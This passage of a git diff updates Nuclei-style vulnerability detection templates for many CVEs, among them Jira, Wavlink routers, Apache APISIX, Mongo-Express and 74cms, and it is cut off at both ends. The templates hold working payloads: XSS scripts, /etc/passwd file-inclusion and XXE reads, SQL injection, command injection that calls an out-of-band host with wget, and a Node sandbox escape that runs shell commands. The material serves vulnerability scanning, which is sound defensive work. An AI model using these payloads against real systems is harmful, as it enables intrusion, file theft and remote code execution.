0.15691 - epss-percentile: 0.95377 - cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: atlassian - product: jira_server - shodan-query: http.component:"Atlassian Jira" - tags: cve,cve2019,jira + reference: + - https://jira.atlassian.com/browse/JRASERVER-69777 + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839 -http: +requests: - raw: - | POST /rest/issueNav/1/issueTable HTTP/1.1 @@ -41,11 +31,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "the user does not exist" - + part: body - type: status status: - 200 -# digest: 4b0a00483046022100b7b546af885a03b0df7684b09ff17e18c6148be5124b25120dbef355415ef24b022100871c06bac93132911abbdf5d5ca5f5bfda0631167b8af35d7973aa8fab44435f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-8937.yaml b/poc/cve/CVE-2019-8937.yaml index fc33321181..21ea7f64cc 100644 --- a/poc/cve/CVE-2019-8937.yaml +++ b/poc/cve/CVE-2019-8937.yaml @@ -1,36 +1,55 @@ id: CVE-2019-8937 + info: - name: HotelDruid 2.3.0 - XSS + name: HotelDruid 2.3.0 - Cross-Site Scripting author: LogicalHunter severity: medium - reference: https://www.exploit-db.com/exploits/46429 - tags: cve,cve2019,xss,hoteldruid + description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php. + remediation: | + Upgrade to a patched version of HotelDruid or apply appropriate input sanitization to prevent XSS attacks. + reference: + - https://www.exploit-db.com/exploits/46429 + - https://sourceforge.net/projects/hoteldruid/ + - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-8937 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 - description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php." -requests: + epss-score: 0.00921 + epss-percentile: 0.81114 + cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: digitaldruid + product: hoteldruid + tags: packetstorm,cve,cve2019,xss,hoteldruid,edb + +http: - method: GET path: - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' - - # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + # - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' - # - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' - - # - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' - - # - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' matchers-condition: and matchers: - type: word - words: - - '"' part: body + words: + - '""> - ]> - - John - &ent; - - - headers: - Content-Type: "text/xml" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100a1f3d8973a3f6a7ac32f58cb5e53efee2c4fa5399249b0178d34336abc912f630221009be727a15ddbd912afed15bf1edec6cc67fcd494709882c5bbc2460e45e1e32f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +id: CVE-2020-11991 + +info: + name: Apache Cocoon 2.1.12 XML Injection + author: pikpikcu + severity: high + tags: cve,cve2020,apache,xml,cocoon + description: | + When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. + reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11991 + cwe-id: CWE-611 + +requests: + - method: POST + path: + - "{{BaseURL}}/v2/api/product/manger/getInfo" + headers: + Content-Type: "text/xml" + body: | + + ]> + + John + &ent; + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2020-13117.yaml b/poc/cve/CVE-2020-13117.yaml index bfc0ff9a86..7f7efe6b19 100644 --- a/poc/cve/CVE-2020-13117.yaml +++ b/poc/cve/CVE-2020-13117.yaml @@ -1,18 +1,32 @@ id: CVE-2020-13117 + info: - name: Wavlink Multiple AP - Unauthenticated RCE + name: Wavlink Multiple AP - Remote Command Injection author: gy741 severity: critical - description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. + description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - tags: cve,cve2020,wavlink,rce,oast + - https://nvd.nist.gov/vuln/detail/CVE-2020-13117 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 -requests: + epss-score: 0.05816 + epss-percentile: 0.92581 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn575a4_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2020,wavlink,rce,oast,router + +http: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 @@ -22,8 +36,20 @@ requests: Accept-Encoding: gzip, deflate newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en + + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: body + words: + - "parent.location.replace" + + - type: status + status: + - 200 +# digest: 4a0a0047304502206b6c68366258ff0f9f19d5481e672ca251188b4aac0272b44aa4165559059429022100eafb7ed5fa6940c5012044041ffa0434bba7f1bda16a36c847d4af1f493a62b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-13121.yaml b/poc/cve/CVE-2020-13121.yaml index 38db107834..18c5bd1dd6 100644 --- a/poc/cve/CVE-2020-13121.yaml +++ b/poc/cve/CVE-2020-13121.yaml @@ -1,24 +1,43 @@ id: CVE-2020-13121 + info: - name: Submitty 20.04.01 - Open redirect + name: Submitty <= 20.04.01 - Open Redirect author: 0x_Akoko severity: medium - description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt. + description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: - https://github.com/Submitty/Submitty/issues/5265 - - https://www.cvedetails.com/cve/CVE-2020-13121 - tags: cve,cve2020,redirect,submitty + - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/authentication/login?old=http%3A%2F%2Flexample.com' + epss-score: 0.00235 + epss-percentile: 0.61542 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos + +http: + - raw: + - | + POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/authentication/login + + user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022035d2421a9ebcfc9da5f2ce7c4f77266308734b45f7b8a598b52e17083179e1eb022100f6795778a9d9d900599a036ee40766d6e8866cf5232da80aebed6772e6553629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-13945.yaml b/poc/cve/CVE-2020-13945.yaml index 6c740884d6..dc1f2480b4 100644 --- a/poc/cve/CVE-2020-13945.yaml +++ b/poc/cve/CVE-2020-13945.yaml @@ -1,22 +1,32 @@ id: CVE-2020-13945 info: - name: Apache APISIX's Admin API Default Access Token (RCE) + name: Apache APISIX - Insufficiently Protected Credentials author: pdteam severity: medium - description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5. + description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. + remediation: | + Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-13945 - tags: cve,cve2020,apache,apisix,rce,intrusive + cwe-id: CWE-522 + epss-score: 0.00558 + epss-percentile: 0.75057 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: apisix + tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix -requests: +http: - raw: - | POST /apisix/admin/routes HTTP/1.1 @@ -34,7 +44,6 @@ requests: } } } - - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} @@ -56,3 +65,4 @@ requests: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" +# digest: 490a00463044022059948a8dfd44a57bc20ceb27424c8b6a9f92b0f5cf9c192aec6022a38870ad0802205e7e7adccf142d1423b78d8783395994e7e97b1269caee8f2f0f4c3807e5dfc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-14408.yaml b/poc/cve/CVE-2020-14408.yaml index da2c7cee43..36f102aa68 100644 --- a/poc/cve/CVE-2020-14408.yaml +++ b/poc/cve/CVE-2020-14408.yaml @@ -1,48 +1,35 @@ id: CVE-2020-14408 - info: - name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + name: Agentejo Cockpit 0.10.2 - Reflected XSS author: edoardottt severity: medium - description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. - remediation: | - Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. - reference: - - https://github.com/agentejo/cockpit/issues/1310 - - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 - epss-score: 0.00113 - epss-percentile: 0.44654 - cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408 metadata: verified: true - max-request: 1 - vendor: agentejo - product: cockpit - tags: cve,cve2020,cockpit,agentejo,xss,oss - -http: + tags: cve,cve2022,cockpit,agentejo,xss,oss +requests: - method: GET path: - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" - matchers-condition: and matchers: - type: word part: body words: - "redirectTo = '/92874';alert(document.domain)//280';" - - type: word part: header words: - "text/html" - - type: status status: - 200 -# digest: 4a0a00473045022100f046742ca6baf1a25c400a234749a56c4b5bb79ff750292c6687d79b1a29787a02206d3d31b553ad045dcae9e83c625840603dad0e8035388a0eb679d1f336962797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-19282.yaml b/poc/cve/CVE-2020-19282.yaml index a0c9ce9a20..b89e24088b 100644 --- a/poc/cve/CVE-2020-19282.yaml +++ b/poc/cve/CVE-2020-19282.yaml @@ -1,48 +1,33 @@ id: CVE-2020-19282 - info: - name: Jeesns 1.4.2 - Cross-Site Scripting + name: Jeesns 1.4.2 XSS author: pikpikcu severity: medium - description: Jeesns 1.4.2 is vulnerable to reflected cross-site scripting that allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - remediation: | - Upgrade to the latest version of Jeesns or apply the vendor-provided patch to fix the XSS vulnerability. + description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. reference: - https://github.com/zchuanzhao/jeesns/issues/11 - - https://www.seebug.org/vuldb/ssvid-97940 - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 + - https://www.seebug.org/vuldb/ssvid-97940 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19282 cwe-id: CWE-79 - epss-score: 0.00135 - epss-percentile: 0.48553 - cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: jeesns - product: jeesns tags: cve,cve2020,jeesns,xss - -http: +requests: - method: GET path: - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '' - + part: body + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 4b0a00483046022100c1617122a3deecf5f59e58103bdb8cdae738169ce090ad2a393518924d6f6657022100e4b1858fa082f420c428304fb5048eb8a637944c11f5aaaf0cdbe24595be5f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-19360.yaml b/poc/cve/CVE-2020-19360.yaml index 260f3ae9f8..b9660cb345 100644 --- a/poc/cve/CVE-2020-19360.yaml +++ b/poc/cve/CVE-2020-19360.yaml @@ -1,30 +1,43 @@ id: CVE-2020-19360 + info: name: FHEM 6.0 - Local File Inclusion author: 0x_Akoko severity: high description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest patch or upgrade to a version that is not affected by the vulnerability. reference: - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md - - https://www.cvedetails.com/cve/CVE-2020-19360/ - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability - https://emreovunc.com/blog/en/FHEM-v6.0-LFI-Vulnerability-01.png + - https://nvd.nist.gov/vuln/detail/CVE-2020-19360 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-19360 + cwe-id: CWE-22 + epss-score: 0.0545 + epss-percentile: 0.92359 + cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fhem + product: fhem tags: fhem,lfi,cve,cve2020 -requests: + +http: - method: GET path: - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/05/04 +# digest: 4b0a004830460221009447a4515b18dedbac516662c7eede6b882e0fe6b6b4a65d90fc04b816af52af0221009b625f9cd0b3451bbb28e290000b1dc79572d03bbba44ddc1291e41581777092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-2036.yaml b/poc/cve/CVE-2020-2036.yaml index b2e2d88fd6..fc2519a3aa 100644 --- a/poc/cve/CVE-2020-2036.yaml +++ b/poc/cve/CVE-2020-2036.yaml @@ -1,53 +1,34 @@ id: CVE-2020-2036 - info: - name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting - author: madrobot,j4vaovo + name: Palo Alto Networks Reflected XSS + author: madrobot severity: high - description: | - PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. - remediation: | - Apply the latest security patches or updates provided by Palo Alto Networks to mitigate this vulnerability. - reference: - - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - - https://security.paloaltonetworks.com/CVE-2020-2036 - - https://nvd.nist.gov/vuln/detail/CVE-2020-2036 + description: > + A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. + + reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ + tags: cve,cve2020,vpn,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-2036 cwe-id: CWE-79 - epss-score: 0.01161 - epss-percentile: 0.83286 - cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: paloaltonetworks - product: pan-os - tags: cve,cve2020,vpn,xss - -http: - - raw: - - | - GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - +requests: + - method: GET + path: + - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" + stop-at-first-match: true matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body_1), '')" - condition: and - - - type: dsl - dsl: - - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" - condition: or -# digest: 4b0a00483046022100a1a6f4b784950a7a2db652c1d0511299ebbbf1b786913e5bc5f57cb55dad99fd022100b49385d913c913fe66bf667e95238f9fa294081837ce4d2890f7aa692f5d1414:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/CVE-2020-20982.yaml b/poc/cve/CVE-2020-20982.yaml index 1a87704c1e..28b76133cf 100644 --- a/poc/cve/CVE-2020-20982.yaml +++ b/poc/cve/CVE-2020-20982.yaml @@ -1,50 +1,35 @@ id: CVE-2020-20982 info: - name: shadoweb wdja v1.5.1 - Cross-Site Scripting - author: pikpikcu,ritikchaddha + name: Shadoweb Wdja v1.5.1 xss + author: pikpikcu severity: critical - description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 + tags: cve,cve2020,xss,wdja,shadoweb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - cvss-score: 9.6 + cvss-score: 9.60 cve-id: CVE-2020-20982 cwe-id: CWE-79 - epss-score: 0.01894 - epss-percentile: 0.8716 - cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wdja - product: wdja_cms - tags: cve,cve2020,xss,wdja,shadoweb + description: "Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php." -http: +requests: - method: GET path: + - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true - matchers-condition: and matchers: - type: word - words: - - "location.href='" condition: and + words: + - '' - type: word part: header words: - 'text/html' - - - type: status - status: - - 200 -# digest: 4b0a00483046022100c2973ea02e1ef4c983deaf88368e6cf64b25806def4904510758d9148407ade9022100cebe427a9709d4b2470349c6770aba8224a0f7d423fde903511013b36060a6f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2020-22211.yaml b/poc/cve/CVE-2020-22211.yaml index 25773d4621..a711842702 100644 --- a/poc/cve/CVE-2020-22211.yaml +++ b/poc/cve/CVE-2020-22211.yaml @@ -1,43 +1,32 @@ id: CVE-2020-22211 - info: name: 74cms - ajax_street.php 'key' SQL Injection author: ritikchaddha severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: - https://github.com/blindkey/cve_like/issues/13 - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22211 + cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94975 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: 74cms - product: 74cms - shodan-query: http.html:"74cms" fofa-query: app="74cms" + shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" - -http: +requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502203d802212754921452f92aa1bc90e0e9f7d26cf8561dcadff8667daaf11d4207c022100a97ce2837eb3d3aeef62bff8690597c2b7f26a53c1867a60026ab79db48f51c4:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/06/21 diff --git a/poc/cve/CVE-2020-24391.yaml b/poc/cve/CVE-2020-24391.yaml index 77a808627e..3ad8a6889b 100644 --- a/poc/cve/CVE-2020-24391.yaml +++ b/poc/cve/CVE-2020-24391.yaml @@ -1,46 +1,39 @@ id: CVE-2020-24391 info: - name: Mongo-Express - Remote Code Execution + name: Mongo-Express Remote Code Execution author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a - https://nvd.nist.gov/vuln/detail/CVE-2020-24391 - - https://github.com/mongodb-js/query-parser/issues/16 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - epss-score: 0.40297 - epss-percentile: 0.96909 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* - metadata: - max-request: 3 - vendor: mongo-express_project - product: mongo-express - framework: node.js tags: cve,cve2020,mongo,express,rce,intrusive -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ + - | GET /public/css/{{randstr}}.css HTTP/1.1 Host: {{Hostname}} + req-condition: true + cookie-reuse: true matchers-condition: and matchers: - type: regex @@ -56,4 +49,5 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4b0a00483046022100ca0a1201e727a6e48faffdcdb0f81f232096b62059c46e8728382c13fef84e93022100ca30c6c9a6b46d6409058e2a80693a7f9ac828e08d7d019575fbe5063f174abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/27 diff --git a/poc/cve/CVE-2020-27467.yaml b/poc/cve/CVE-2020-27467.yaml index 3c98e2d877..07630aa8de 100644 --- a/poc/cve/CVE-2020-27467.yaml +++ b/poc/cve/CVE-2020-27467.yaml @@ -1,12 +1,9 @@ id: CVE-2020-27467 - info: name: Processwire CMS <2.7.1 - Local File Inclusion author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. - remediation: | - Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - https://processwire.com/ @@ -17,27 +14,18 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.00913 - epss-percentile: 0.81014 - cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: processwire - product: processwire tags: cve,cve2020,processwire,lfi,cms,oss - -http: +requests: - method: GET path: - "{{BaseURL}}/index.php?download=/etc/passwd" - matchers-condition: and matchers: - type: regex regex: - 